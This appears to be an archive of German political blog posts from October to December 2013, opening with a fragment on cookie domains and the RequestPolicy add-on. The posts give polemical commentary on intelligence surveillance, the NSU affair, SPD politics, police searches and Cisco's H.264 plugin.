An sich ist das keine doofe Idee, aber der richtige Ansatz dafür wäre natürlich, dass man die Cookies für www.example.com setzt und die statischen Inhalte auf s.example.com tut, und http://example.com ist dann eine Umleitung auf www.example.com. Aber da kommen dann halt Leute und sagen, naja, yimg.com ist ja ein Zeichen kürzer als yahoo.com, das spart auch!1!! Ja, tut es, aber dafür schafft es zusätzliche Latenzen, weil yimg.com separat im DNS nachgeguckt werden muss und dafür auch der Nameserver von yimg.com separat herausgefunden werden muss.
Ich glaube ja, dass die meisten dieser "Web-Optimierer" die ganzen Details gar nicht überblicken und da Cargo Cult betreiben. Aber hey. Whatever.
Dieses RequestPolicy hat natürlich ein paar negative Aspekte in der Usability. Eine Sache, die z.B. ziemlich sofort zu nerven beginnt, ist dass HTTP-Redirects dann auch opt-in sind. Man muss explizit [Allow] klicken. Und viele Dienste leiten externe Links inzwischen über Tracking-URLs mit Redirect. Z.B. die Google-Suche. Auch dafür gibt es Addons, aber so generell macht das für die Twitter-Generation wahrscheinlich auch das Browse-Erlebnis mit URL-Shortenern kaputt. Das würde ich wiederum eher als Vorteil sehen, das ist eine Unsitte und shortened natürlich auch nichts, weil unter dem Strich mehr Traffic verursacht wird und die Latenz hochgeht.
Ich würde mal vermuten, dass das auch eingebettete Videos kaputtmacht, wenn die woanders gehostet werden.

Wed Dec 11 2013

[l] Der heutige LKA-Präsident hat Ermittlungen gegen den NSU verhindert. Und zwar nicht indirekt über Budgetkürzungen oder so. Nein.
Demnach habe der heutige LKA-Präsident Werner Jakstat 2003 die Anweisung gegeben, einem Zeugenhinweis nicht nachzugehen.
Money Quote:
"Der Auftrag hat gelautet: Fahrt mal raus, damit keiner sagen kann, wir hätten gar nichts gemacht. Also haben wir den Zeugen befragt. Aber wir sollten nichts ermitteln. Es wurde explizit gesagt: Kriegen Sie da nichts raus."

Mon Dec 9 2013

[l] Wieso vergeben deutsche Behörden eigentlich überhaupt Aufträge an US-Rüstungs-Mittäterfirmen wie CSC und Booz Allen Hamilton? Die Süddeutsche hat die Antwort:
Ein hochrangiger deutscher Sicherheitsbeamter hingegen findet solche Auftragsvergaben "legal und normal". Die amerikanischen Firmen seien eben die besten IT-Dienstleister. "Wir haben solche Leute nicht", sagt er. "Wir brauchen die. Ich vertraue denen."
Mit anderen Worten: T-Systems ist Schuld. Wenn die was könnten, müssten wir nicht die Amis reinholen!1!!
Anders herum sind eigentlich wir Schuld. Der Grund, dass die bei uns keine guten Leute finden, ist ja, dass unsere guten Leute sich für deren kriminelle Machenschaften nicht hergeben. Insofern auf der einen Seite: Gut gemacht. Auf der anderen Seite brauchen wir schnell ein Verbot für den Einkauf von die nationale Sicherheit betreffenden Dienstleistungen bei ausländischen Firmen, aus Gründen der nationalen Sicherheit. (Danke, Walter)

Sat Dec 7 2013

[l] Das schwedische Fernsehen hat mal ein bisschen Geheimdienst-Buddeln gemacht, und wie immer, wenn man im Geheimdienstumfeld zu buddeln anfängt, kommt stinkender Klärschlamm hoch. Noch nie ist da irgendwas Positives gefunden worden. In Schweden kam jetzt raus, dass der schwedische Geheimdienst für die USA Russland und das Baltikum abgeschnorchelt hat, und zwar nicht nur Militär und Politiker sondern auch zivile Ziele wie den Energiesektor. Das haben sie nicht gemacht, weil sie das wissen wollten, sondern damit sie was hatten, das sie den Amerikanern geben können.
Das ist überhaupt ein Muster, das man häufig sieht. Deutschland hat ja aus ähnlichen Erwägungen heraus dieses SAR-LUPE-Spionagesatellitenprogramm.
[l] Au weia, Sigmar Gabriel hat bei seinem Besuch bei den Jusos einen Einlauf gekriegt, der in die Geschichte eingehen wird. Und wie neulich bei der Slomka hat er gezeigt, dass er eben doch kein erfahrener Politiker ist, und sich zu diesem Klogriff hinreißen lassen:
"Frau Steinbach würde ich nicht als Rassistin bezeichnen", sagt er über Erika Steinbach, die Vorsitzende des Bundes der Vertriebenen, CDU-Bundestagsabgeordnete und ein rotes Tuch für die Linken, nicht nur bei den Jusos.
Dabei ist der eigentlich nicht doof, aber halt eher Langfrist-Stratege, nicht schlagfertig. Der braucht Zeit, sich vorher einen Plan zurecht zu legen. Man würde denken, dass er sich die Zeit für die Jusos nimmt. Aber offensichtlich hat der gerade alle Hände mit Feuerlöschen voll.
Auf der anderen Seite sind die Jusos natürlich auch politisch überhaupt nicht ernstzunehmen mit ihrem Antideutschen-und-Womyn's-Rights-Vokabular. Check mal deine Privilegien, Alter!1!!
Und damit ist auch klar, dass Gabriel nur auf Granit beißen konnte, egal mit welchen Argumenten er gekommen wäre. Fundamentalisten kann man nicht mit Argumenten oder Kompromissen überzeugen. Bei Fundamentalisten bringt es nichts, wenn man auf bereits erzielte Errungenschaften verweist. Im Gegenteil wird einem dann erst Recht vorgeworfen, dass man die Weltrevolution mit faulen Kompromissen aufhält. Der Gabriel kann froh sein, dass ihm niemand Derailing vorgeworfen hat (das solltet ihr überhaupt mal in Ruhe lesen, vielen ist ja gar nicht klar, dass es dieses Gedankenspektrum überhaupt gibt. Money Quote:
Der Prozess, “Fakten” höher zu bewerten als “Meinungen” ist sehr stark im Interesse verwurzelt, Privilegien zu bewahren.
Viel Spaß bei der Lektüre!)
Ich betrachte ja dieses Privilegien-Checken-Getue ähnlich wie die Pro-Life-Fraktion. Die haben sich lange genug eine Nische so zurechtgelegt, dass sie sich in einer Opferrolle hinein interpretiert haben. Gerade bei den Pro-Lifern ist das zu schön, wenn sich weiße Mittelschichtsangehörige mit Eigenheim und zwei Autos als verfolgte Minderheit fühlen. Dieses indignierte Gestikulieren empfinde ich als sehr unterhaltsam. Und genau wie man nie jemanden von der Pro-Life-Fraktion sieht, der ein paar schwarze HIV-Babies adoptiert, deren Vater unbekannt und deren Mutter Crack-abhängig ist und abtreiben wollte, genau so wenig kann man Privilegien-Checken-Leute dabei beobachten, wie sie tatsächlich Privilegien abzugeben gewillt sind, sobald das mit persönlichen Einschnitten in die Lebensqualität verbunden wäre. Zieht jemand von denen nach Afrika und hilft da Verhungernden? Setzt da wer ein Testament auf, das ihr Hab und Gut an die Zigeuner vererbt, wenn sie mal welches erlangen sollten? Lernt da jemand Brotbacken und verteilt das Brot unter den Armen? Zahlt da jemand freiwillig mehr Studiengebühren, weil das ein Privileg ist? Zahlt jemand von denen seine Arztrechnung lieber aus eigener Tasche und lässt die Versicherung in Ruhe? Geben diese Leute alles auf, werden Arzt und ziehen nach Haiti und helfen da Menschen?
Nein.
Aber wisst ihr, wer das macht?
Die Kubaner.
Und denen geben wir zur Strafe noch ein Handelsembargo oben drauf. Ich hab neulich so einen Artikel gelesen, der war in der Beziehung augenöffnend. Dass die Haitianer und die westlichen Hilfsorganisationen die kubanischen Ärzte rausekeln wollten, weil sie selbst so schlecht aussahen im Vergleich. Denn die westlichen Ärzte bauen Zeltlager auf und helfen denen, die es bis zu ihnen schaffen. Die kubanischen Ärzte ziehen in die Dörfer, lernen die Landessprache und helfen vor Ort. Die haitianischen Ärzte gehören der Oberschicht an und haben auch keinen Bock auf Urwald, Sumpf und Eingeborenenstämme. Die Kubaner sind echt die einzigen, die sich morgens im Spiegel in die Augen gucken können.
Wir im Westen führen einen Studiengang ein, legen uns eine neue Sprache dafür zurecht, und glauben, damit irgendjemandem geholfen zu haben.
Auf der anderen Seite passt das ja auch prima zur SPD. Jede Partei hat die Jugendorganisation, die sie verdient hat. Wer es ernst meint mit dem Wort "sozialdemokratisch", der ist zur Linkspartei gegangen. Bei der SPD hängen nur noch die ganzen Pseudos herum. Warum sollte das bei deren Jugendorganisation anders sein.
Wenn wir mal ehrlich sind, ist schon die Tatsache, dass wir uns hier über Geheimdienstexzesse und Internetfilter unterhalten, ein seltenes Privileg. Unser Wohlstand basiert auf einer historischen Schuld, die leider nicht weggeht, wenn wir unsere Privilegien jetzt aufgeben. Und es geht ja leider auch den Unterprivilegierten nicht besser, wenn wir Privilegien aufgeben. In Ländern, in denen plötzlich Wohlstand ausbricht, z.B. China, ist der genau so schlecht verteilt wie bei uns. Ein paar Superreiche, und das Gros der Bevölkerung ist knapp über dem Verhungern oder hungert. Solange wir dafür keine Lösung finden, müssen wir über den Rest gar nicht reden. Solange wir schon innerhalb unseres Landes und der EU nicht in der Lage sind, Obdachlosigkeit abzuschaffen, und dafür zu sorgen, dass im Winter niemand erfriert, weil Heizen zu teuer war, werden wir die Ungerechtigkeit gegenüber anderen Teilen der Erde ganz sicher nicht lösen können. Und im Grunde will das ja auch niemand. Sonst könnte die EU sowas wie Frontex ja gar nicht machen, wenn nicht die breite Mehrheit der Bevölkerung das insgeheim so haben wollen würde. Und unsere "Entwicklungshilfe". Damit wir uns weniger schuldig fühlen, machen wir Altkleidersammlung, und das wird dann kommerziell nach Afrika gekarrt und dort verhökert. Wie, dachtet ihr etwa, das wird dort unter den Bedürftigen verschenkt? Nix da. Das wird verkauft. Und zwar so billig, dass es jeweils die inländische Textilindustrie kaputt gemacht hat. So eine tolle Hilfe sind wir mit unseren Hilfsprojekten.
Aber Hauptsache ihr habt alle eure Privilegien gecheckt! Dann sterben gleich ne Million Afrikaner weniger an Hunger — oder an deutscher Munition aus deutschen Gewehrläufen.
Update: Nach all der schlechten Laune sollte ich vielleicht noch sagen, dass ich mich diebisch gefreut habe, dass wenigstens die Jusos genug Arsch in der Hose haben, zu ihrer Ablehnung von Merkel-Appeasement-Politik von vor der Wahl zu stehen. Die sind noch nicht alt genug, um das Umfallen ausreichend verinnerlicht zu haben. In diesem Sinne: Auch ein blindes Huhn findet mal ein Korn.

Tue Dec 3 2013

[l] Australiens Geheimdienst hat eine Hausdurchsuchung beim dem Anwalt gemacht. Der gute Mann vertritt Osttimor in einem Fall von australischer Spionage gegen den australischen Geheimdienst. Das ist ja schon unglaublich, aber kommt noch besser:
He says the agents identified themselves as working for ASIO and the AFP, and would not show his employees the search warrant because it related to national security.
Wie geil ist DAS denn! Die haben nichtmal den Durchsuchungsbefehl vorgezeigt! Wahrscheinlich weil sie keinen hatten. Darauf muss man auch erstmal kommen. Ob die Australier auch Geheimgerichte haben, wie die Amis und Briten? (Danke, Leo)
[l] Jetzt war es endlich so weit: Die ARD hat ihre Mercedes-Benz-Argentinien-"Dokumentation" gebracht. Hier ist die Stellungnahme von Gaby Weber dazu. Sie schreibt u.a., dass die Firma, die das gemacht hat, ansonsten auch Werbefilme für Daimler dreht. Ihr Eindruck ist, dass die ihre Recherchen geklaut haben, dann die peinlichsten Details rausgelassen haben, und den Rest als "schaut mal, ist doch alles super aufgearbeitet jetzt" die offizielle Geschichtsschreibung werden lassen wollen. Man muss dazu sagen, dass Gaby mit eigenen Mitteln einen Dokumentarfilm gedreht hat, den die ARD aber nicht haben wollte. Die haben lieber Geld für diese Neuverfilmung ausgegeben, als einen fertigen Film zu kaufen. Da sieht man mal, was für einen Einfluss das Daimler-Werbebudget offenbar hat. Krass. Oder hey, vielleicht geht das ja auch über den politischen Arm.
Ist jedenfalls alles eine sehr traurige Geschichte.
Wer sie noch nicht gehört hat, dem sei auch Alternativlos 26 nochmal empfohlen, das wir mit Gaby zusammen aufgenommen hatten.
Update: Markus Kompa ist auch unzufrieden mit der Gesamtsituation und verlinkt dankenswerterweise auf Gabys Dokumentarfilm.
Update: Zuständig ist übrigens der WDR Rundfunkrat, erreichbar unter rundfunkrat (at) wdr.de
[l] Das Landgericht Hamburg wirft Deutschland mal wieder um Jahrzehnte zurück. Diesmal muss der Geschäftsführer von Appwork persönlich für den automatisiert erstellten und zum Download angebotenen Nightly Build einer Open Source Software haftbar gemacht. Begründung:
Zwar liege eine Open-Source-Entwicklung vor, deren Produkt habe Appwork sich aber zu eigen gemacht. Hierfür spreche, dass der Hersteller finanziell durch Werbung von der Verbreitung der Software profitiere. Im Informationsfenster der Software sei ein Vermerk zugunsten des Unternehmens angebracht.
Damit liegt die Idee nahe, ab jetzt in solcher Software lieber Werbung für das LG Hamburg und vielleicht noch die eine oder andere Abmahnkanzlei einzubauen. Mal schauen, was passiert, wenn das jemand ausprobiert. (Danke, Tim)
[l] Der Guardian-Chefredakteur muss jetzt bei einer Anhörung des Innenministeriums Rede und Antwort stehen wegen seines Vaterlandsverrats. Natürlich ohne dass sie ihm vorher die Fragen verraten, wie sie es bei den Geheimdienstbossen getan hatten. So ein richtiger Schauprozess muss ja auch unfair sein, sonst funktioniert das doch nicht!
Update: Und so lief die Befragung. Die haben den Rusbridger gefragt (festhalten), ob er sein Land liebe. Und er musste sich dann damit verteidigen, dass der Guardian von Patrioten gemacht würde. WTF?!

Mon Dec 2 2013

[l] Die SPD will ihre Ministerposten mit Frauenquote besetzen. Weil ihnen die Wählerinnen weggelaufen sind, wie das ehemalige Nachrichtenmagazin schreibt.
Ich finde: Tolle Idee. Endlich werden wir nicht nur von Männern sondern auch von Frauen verraten. Da stehen die Wählerinnen tierisch drauf, wie ich hörte, wenn sie nicht von alten Männern mit Filzstiften sondern von anderen Frauen verraten werden. Überhaupt, wer mag das nicht, von der Verräterpartei mal wieder so richtig verraten zu werden?
Ich würde ja vorschlagen, dass sie die Posten an Judo-Kenner vergeben. Die tun sich beim dauernden Umfallen dann wenigstens nicht so weh.
Dass die wirklich glauben, mit dieser PR-Kosmetik-Scheiße darüber hinwegtäuschen zu können, dass sie die Vorratsdatenspeicherung einführen wollen! Unglaublich. Aber hey, irgendjemand muss die ja gewählt haben. Ist mir ja völlig unbegreiflich. Wahrscheinlich sollte man mal die Krankenhäuser befragen, das müssen ja alles Leute mit Dutzenden von Dolchstößen im Rücken sein.
Ich las ja heute bei irgendeinem Wurstblatt im Wartezimmer die Theorie, dass die SPD-Wähler alles Leute sind, die nur Dank der SPD überhaupt eine Chance gehabt haben im Leben. So hat sich jedenfalls ein SPD-Wähler in einem Leserbrief zu verteidigen versucht. Falls das jemand nicht mehr auf dem Radar hat: Wenn in der Politik jemand von Chancen redet, hat er Neocon-Gedankengut von der Bertelsmann-Stiftung übernommen. Aber es scheint ja zu funktionieren. Wenn es in diesem Land so viele Leute gibt, die glauben, sie hätten dank der SPD (!!) eine Chance gehabt. Denn daraus folgt auch, dass es ihre eigene Schuld ist, aus der Chance nichts gemacht zu haben. Das ist genau die Kernmechanik des Turbokapitalismus. Dass die Armen den Reichen glauben, es sei ihre eigene Schuld, dass sie arm sind.
Update: Weil jetzt hier Mails eingehen, die Bildungsreform der 1960er und 1970er sei der SPD anzurechnen: Nein. Zum Vergleich: Wann welche Partei die Regierung stellte. Nur ein Teil davon fällt überhaupt in die SPD-Amtszeit, und das hat auch eher die Politik von Erhard und Kiesinger fortgesetzt. Auslöser für die Einsicht, dass wir Bildung fördern müssen, war Sputnik. Mit anderen Worten: Die Russen.
[l] Lesenswert: Ein Australier darüber, dass Spionage nicht funktioniert. Er begründet das u.a. mit den Erfahrungen, die wir so gemacht haben, und mit der Spieltheorie:
The basic lesson of game theory for a game of bluff like that of espionage is that, as long as it is possible for counterspies to generate misleading information most of the time, spies are useless even when their information happens to be correct. If the defence plays optimally, the spymaster can never have any reason to believe one piece of information produced by spies and disbelieve another.

Fri Nov 29 2013

[l] Kann mir mal jemand diese Slomka-Nummer erklären? Ich verstehe das nicht. Ich hab das gestern als Clip in der Mediathek geguckt und war entsetzt, was für eine debile Frage das war, auf der diese Slomka da beharrte. Wirklich? ZDF? Von all den Dingen, die man der Verräterpartei vorwerfen kann, … dass sie da ihre Demokratiesimulation geringfügig virtuell ausweiten, DAS werft ihr denen vor? Ich sah das gestern und dachte mir, meine Güte, hab ich die doch falsch eingeschätzt. Denn an sich mag ich das ja, wenn Journalisten mal härter nachfragen und sich nicht verarschen lassen. Aber an der Stelle? Das war wie wenn Fox News beharrlich den Sprecher von Obama nachfragt, wieso sie Amerika mit Obamacare zerstören wollen. Überhaupt kein Erkenntnisgewinn, reines Theater. Damit hat sie echt ihre Arbeit der letzten Jahre kaputtgemacht. Weil sie gezeigt hat, dass das reines Ritual ist und nichts mit Erkenntnisgewinn oder der Presse als vierter Gewalt zu tun hat.
Ich fand das sehr schade insgesamt. Auch dass das ZDF es nicht schafft, da innerhalb Deutschlands eine Verbindung hinzukriegen, die nicht eine Sekunde Latenz hatte. Da hab ich ja weniger Latenz, wenn ich über das Internet per Voip nach Amerika telefoniere! Was zur Hölle, ZDF? Gibt es da kein Internet auf dem SPD-Parteitag?! Diese Latenz war genau so groß, dass sich die beiden Seiten auch ständig ins Wort fielen. Da kam echt alles an Inkompetenz und Verkacken zusammen gestern.
Aber so richtig schlimm wurde das ja erst heute, als praktisch alle großen Medien auch noch einen Kommentar dazu veröffentlichen mussten. Wirklich? Anstatt mal selber der SPD ein paar peinliche Fragen zu stellen, debattiert ihr jetzt über die Fragen der Frau Slomka? Mann Mann Mann.
So eine flächendeckende Bankrotterklärung der Medien habe ich schon länger nicht mehr so intensiv wahrgenommen.

Thu Nov 28 2013

[l] Heiner Flassbeck erklärt, wie so ein Koalitionsvertrag entsteht:
Zu Beginn der Verhandlungen geben alle Minister an ihre Heerscharen von Beamten die Order aus, alles Wichtige, was das Ministerium in der Vergangenheit gemacht hat, zu Papier zu bringen, um es für die nächsten vier Jahre zu sichern. Dann nehmen die Beamten ihre Erfolgsbilanzen, die sie schon einhundert Mal in den letzten vier Jahren niedergeschrieben haben, und drehen die üblicherweise vergangenheitsbezogenen Sätze in die Zukunft.
[l] Wo wir gerade bei der deutschen Kolonialgeschichte waren… mir schickt gerade jemand zwei Urlaubsfotos von sich, die er 2011 in Namibia gemacht hat. Die Bilder entstanden im Etosha-Nationalpark. Dort stand eine sehr gut erhaltene deutsche Festung namens Namutoni, und in dieser Festung ist diese Gedenktafel in die Wand eingearbeitet. Wie krass ist DAS denn! Da sieht man mal wieder, dass immer der Sieger die Geschichtsbücher schreibt. (Danke, Michael)

Tue Nov 26 2013

[l] Die FAZ hatte vor ein paar Tagen im Feuilleton einen Schwerpunkt zum Thema, ob man nicht ein EU-IT-Projekt machen sollte jetzt. Da haben sie mehrere Leute dazu befragt, was sie dazu denken. Das war auch gar nicht so schlecht, aber ich habe mich ein bisschen über so die üblichen PR-Antworten geärgert und einen Leserbrief hingeschrieben. Zum Beispiel fand ich die Aussage von Neelie Kroes Heuchelei, denn sie hätte da seit vielen Jahren Dinge tun können und hat es nicht. Und dieser G-Data-Typ, der sich hinstellt, das Problem generell für unlösbar erklärt und dann seine Software empfiehlt, das fand ich der FAZ unwürdig.
Daraufhin schrieben die mir zurück, ich soll doch auch mal einen Text schreiben. Habe ich gemacht, und der ist ab heute online. Leider haben sie da inhaltlich umformuliert und gekürzt, damit das in den Platz in der Printausgabe passt, den sie dafür freigemacht hatten. Daher, und aus generellen Transparenzgründen, stelle ich meine Rohfassung auch online.
Mir waren da ein paar Punkte ganz wichtig. Erstens ist es offensichtlich, dass sich bei einem länderübergreifenden Großprojekt die Teilnehmer gegenseitig trauen müssen, und dass wir England nicht trauen können, weil die uns komplett abschnorcheln. Aber dass die Nine Eyes auch Schengen-Mitglieder haben, das ist offenbar noch nicht vielen aufgefallen. Und dass unser BND-Gesetz zwar Inländer schützt, aber damit Deutsche und nicht EU-Bürger gemeint sind, und daher die anderen EU-Länder auch uns nicht trauen können, das hat in dieser ganzen Debatte irgendwie noch niemand für erwähnenswert gehalten.
Der zweite Teil meiner Ausführungen versucht darzustellen, dass IT-Großprojekte einen furchtbaren Track Record haben, aber nicht generell unmöglich sind. Man muss sie nur richtig angehen. Dafür unterbreite ich ein paar Vorschläge, wie man das tun könnte.
Ursprünglich habe ich noch ein ceterum censeo dran gehabt, dass die Geheimdienste zerschlagen werden müssen, aber ich habe mich überreden lassen, das rauszunehmen, um der CDU keinen billigen Weg in die Hand zu geben, das ganze Ding als unrealistisch abzutun.
Na mal gucken, ob da jetzt eine Debatte entsteht.
Update: Ui, da scheine ich ja einen Treffer gelandet zu haben, wenn man von der Präsenz der Schadensbegrenzung-Agitprop-Truppen in den FAZ-Kommentaren ausgeht. "aber aber die Terroristen!1!!" ist immer das letzte Argument der Argumentlosen.
Ich erhebe übrigens nicht den Anspruch, der große Projektmanager zu sein, und ich habe auch noch kein länderübergreifendes Großprojekt gemanaged. Wie jede wissenschaftliche Auseinandersetzung beginnt eben auch hier die Wahrheitsfindung mit dem Aufstellen von Hypothesen.

Thu Nov 21 2013

[l] Sucht noch jemand einen Grund zum Auswandern? Hier, bitte, gern geschehen. 49% wollen Computerspiele mit Gewaltdarstellungen verbieten. 42% wollen linksradikale Parteien verbieten (äh, welche genau wären das?). Nur 36% wollen hohe Parteispenden verbieten. 32% wollen Pornographie verbieten. 19% wollen den Verkauf von hochprozentigem Alkohol verbieten lassen. Wo zur Hölle haben die denn bitte diese Umfrage gemacht? Auf einem Parteitag der Bayernpartei!? (Danke, Tobias)
[l] Mir hat da gerade jemand einen Artikel aus einer französischen Zeitung geschickt, die leider online nur hinter einer Paywall verschanzt ist. Die schreiben (mein Französisch ist leider ziemlich schlecht), wenn ich das richtig verstehe, dass jemand beim Europäischen Parlament in Straßburg die Mails der Abgeordneten abgeschnorchelt hat. Der Artikel klingt, als habe da jemand schlicht einen mobilen WLAN-AP aufgemacht. Das wäre selbst für Politikerverhältnisse auffallend inkompetent, wenn die da intern keine Verschlüsselung fahren. Aber hey, das EU-Parlament ist ja leider noch nie sonderlich durch Kompetenz aufgefallen. Dem Artikel nach setzen die da breitflächig Microsoft Exchange und Activesync ein.
Update: Die Meldung hat es nach Deutschland geschafft. (Danke, Martin)
[l] Schlagzeile des Tages: Nur 90 Firmen produzierten 2/3 der menschlichen Treibhausgas-Emissionen in der Geschichte der Menschheit. Ist leider ein bisschen irreführend, weil die da halt die ganzen Ölfirmen drin haben. Die emittieren ja das ganze Treibhausgas nicht selber sondern verkaufen das an Menschen, die das dann emittieren. Denen jetzt die Schuld zuzuschieben erscheint mir nicht zielführend, das ist wieder nur so ein geistiger Ablasshandel, damit sich die Einzelpersonen nicht so schuldig fühlen müssen mit ihren überflüssigen Innenstadtautos und ihren Mallorca-Flügen. Der Punkt ist, dass die Ölfirmen kein Öl verkaufen könnten, wenn es ihnen niemand abkaufte. Der Punkt an dieser Statistik ist, dass sie das gemacht haben, um von dem auf-Länder-Zeigen wegzukommen, weil das zu nichts geführt hat, solange die USA und China die Hauptschuldigen sind und nichts ändern wollen. Solange unsere Wirtschaft komplett auf Öl basiert, ist dieses Fingerzeigen auf die Ölfirmen m.E. noch sinnloser als auf die USA und China zu zeigen und dann selber Kohle zu verbrennen.

Mon Nov 18 2013

[l] Wisst ihr noch, im kalten Krieg, als wir uns über den Ostblock lustig gemacht haben? Wie die immer ihre Hotels verwanzt haben? Es gab überhaupt nur ein gutes Hotel am Platz, und das war vollständig verwanzt? Was gab es da für Enthüllungsfilme! Ich erinnere mich an einen ARD-Film über ein Hotel an der Ostsee, und am Berliner Alexanderplatz gab es auch ein Ost-Prunkhotel, von dem man sich zuraunte, dass das alles verwanzt sei. Man raunte sich das so von oben herab zu. Diese Ossis, wie kann man so tief sinken!
Dann kamen irgendwann Geschichten, dass die Franzosen auch ihre Hotels verwanzt hätten, damit sie besuchende Diplomaten und Geschäftsleute abhören können, für Industriespionage. Die Reaktion war ähnlich. Meine Güte, diese Franzosen, die müssen ja verzweifelt sein! Wie kann man so tief sinken!
Und jetzt? Jetzt kommt raus, dass GCHQ 350 Luxushotels weltweit überwacht hat. Die haben über ihre Schnüffeleien gegen ausländische Länder Alerts rausgeschickt, wenn ein Diplomat in einem dieser Hotels abstieg, und dann vorher die Zimmer "vorbereitet".

Thu Nov 14 2013

[l] Von wo aus organisieren die USA eigentlich ihre Drohnenmorde, Entführungen und Folterknäste? Das müsste ja ein Land sein, das es sich so vollständig im Dickdarm der USA gemütlich gemacht hat, dass man sich bei denen wirklich sicher sein kann, dass die es niemals wagen würden, auch nur eine doofe Frage zu stellen. Na klar! Deutschland!
Wo auch sonst.

Fri Nov 8 2013

[l] Hey, wisst ihr, was wir lange nicht mehr gemacht haben? Neue Atombomben gebaut!
Die neue Variante der Atombombe, genannt B61-12, soll demnach nicht nur die älteren Typen 3, 4, 7 und 10 ablösen, sondern auch den nuklearen Bunkerknacker B61-11 und die strategische B83-Bombe überflüssig machen.
Und wo soll die stationiert werden, die neue Amerika-Bombe? Natürlich in Deutschland! Wo auch sonst?

Wed Nov 6 2013

[l] Bei einem Verkehrsstop in New Mexico ist ein Mann an einem Stop-Schild nicht vollständig zum stehen gekommen mit seinem Auto. Die Polizei hat ihn daraufhin angehalten und ihm gesagt, er soll aus dem Auto aussteigen. Dabei glaubte der Polizist beobachten zu können, dass der Mann sich die Arschbacken zusammenkniff, und folgerte messerscharf, dass der da Drogen versteckt haben muss. Daraufhin haben sie ihn verhaftet und von einem Richter einen Durchsuchungsbefehl erwirkt. Nein, nicht für das Auto. Für den Hintern von dem Mann. Erst haben sie den Typ geröntgt. Dabei kam raus, dass der keine Drogen im Körper versteckt hatte. Aber völlig klar, von entlastenden Beweisen lässt sich ein Polizeistaat nicht aufhalten. Also haben sie dem Mann mit den Fingern im Hintern herumgepolkt und auch nichts gefunden. Natürlich reichte das auch noch nicht. Also bekam der Mann drei Einläufe und musste unter Aufsicht seinen Darm entleeren. Als da immer noch nichts rauskam, haben sie ihn nochmal geröntgt, und dann noch zur Sicherheit eine Darmspiegelung gemacht. Natürlich kam dabei immer noch nichts raus.
Krass, denkt ihr euch jetzt vielleicht. Aber wartet, kommt noch besser. Stellt sich raus, dass der Durchsuchungsbefehl schon länger abgelaufen war, als sie die Prozeduren anwendeten. Und dass das Krankenhaus in dem Kreis, in dem der galt, sich geweigert hat, das zu machen, und da haben sie ihn in den Nachbarkreis gefahren, wo der Durchsuchungsbefehl gar nicht gegolten hätte. Abgesehen davon dass der Befehl wahrscheinlich eh ungültig war, weil es keinen "probable cause" gab und er viel zu unspezifisch war, was denn jetzt genau gemacht werden darf.
Wartet, wird noch härter. Das Krankenhaus hat dem Mann jetzt eine Rechnung geschickt. Ich musste spontan an den Film Brazil denken.

Thu Oct 31 2013

[l] Cisco und Mozilla haben einen Lizenz-Hack gemacht. Cisco hat H.264 lizenziert und sich das Kleingedruckte genau durchgelesen. Darin gibt es ein Limit für die Lizenzgebühren, die pro Jahr fällig werden können. Das Limit sind 6,5 Millionen Dollar pro Jahr. Cisco hat sich überlegt: Was die nächste Generation an Internet-Wachstum zurückhält, ist dass die Leute noch nicht alle WebRTC zum Chatten in ihrem Browser benutzen. Cisco hat auch keinen Bock auf nicht-offene Standards, daher ist ihnen WebRTC wichtig. WebRTC scheitert im Moment daran, dass Mozilla nicht bereit ist, für Firefox Lizenzgebühren an die MPEG-Mafia zu zahlen. Kein Wunder, sie verteilen Firefox ja kostenlos, und die Lizenzgebühren sind pro Kopie der Software.
Ciscos Hack ist, dass sie jetzt einen H.264-Codec als Plugin verschenken, ordentlich lizenziert. Das darf sich dann jeder installieren und damit H.264 abspielen, ohne dass Lizenzgebühren fällig werden.
Sieht erstmal elegant aus, aber ist in vielerlei Hinsicht ein Desaster. Erstens haben wir uns damit erpressen lassen. Damit hat das System "Lizenzgebühren für internationale Standards" gewonnen. Soweit hätte es nie kommen dürfen, aber jetzt ist klar: Der Widerstand dagegen ist gescheitert.
Zweitens heißt das, dass man jetzt für H.264 das Cisco-Modul verwenden muss, dann muss man keine Lizenzgebühren zahlen. Wer wäre unter diesen Umständen so doof, ein anderes Modul zu nehmen? Niemand. Wenn sich dieses System einbürgert, dann haben wir alle verloren, weil für die nächste Iteration von Standard nicht mehr ein Konkurrenzkampf an Implementationen die Qualität hochtreiben wird, sondern es wird genau einen Binärblob von Cisco gehen.
Damit sind wir beim dritten Problem. Was, wenn da ein Bug drin ist? Ein Sicherheitsloch? Eine Hintertür? Damit wäre dann die ganze Welt davon abhängig, dass Cisco den Kram wartet. Und um Cisco ranken sich seit mindestens 20 Jahren Gerüchte, dass sie im Gegenzug für Exporterlaubnisse Hintertüren für die US-Regierung eingebaut hätten. Dieser H.264-Blob wäre quasi das perfekte Einfallstor für die NSA. Die NSA wäre doof, da nicht sofort aufzuspringen.
Oh und nehmen wir mal an, das wird jetzt der große Erfolg, nach dem es aussieht. Wieso würde das dann beim nächsten Codec nicht genau einen Lizenznehmer geben? Wer sich unter diesen Umständen noch eine Lizenz von denen kauft, ist doch doof! Das muss sich auch die MPEG-Mafia gerade durch den Kopf gehen lassen. Und die einzige Antwort ist, diese Klausel rauszunehmen für die nächsten Codecs.
Ich persönlich halte es daher jetzt für noch wichtiger als bisher, H.264 loszuwerden, und hoffe auf Daala.
Der Typ hinter Ogg Vorbis und Daala sieht das übrigens ziemlich ähnlich.

Tue Oct 29 2013

[l] Die Polizei hat eine Hausdurchsuchung beim Geschäftsführer der CDU Frankfurt gemacht. Wegen Verdachts auf Besitz von Kinderpornographie. ACH DESHALB hat die CDU immer Kinderpornos als so ein großes Problem eingeschätzt!

Sat Oct 26 2013

[l] Seht euch nur mal diese Forderung der Union an.
"Wir brauchen ein IT-Sicherheitsgesetz»" sagte Unionsvize Günter Krings (CDU) der Rheinischen Post (Samstag). Darin müsse den Unternehmen eine Kooperationspflicht mit den Sicherheitsbehörden auferlegt werden
Kommt euch das irgendwie bekannt vor? Wenn eine Nationale Sicherheitsbehörde (National Security Agency) Unternehmen zur Kooperation zwingen kann?
Und so hat halt jedes Land seine Republikaner. Bei uns sind sie genau so schlimm wie in den USA. Sie trauen sich zwar nicht mehr, offen gegen Abtreibung zu wettern, dafür haben sie Kristina Schröder zur Familienministerin gemacht. Die hat ja hingeworfen, weil sie festgestellt hat, dass Vollzeitarbeit und Familie nicht gleichzeitig geht. ACH NEE, FRAU SCHRÖDER. Haben Sie das ganz alleine herausgefunden? Da weiß man, dass die Frau von der CDU wegen ihrer herausragenden geistigen Fähigkeiten berufen wurde.
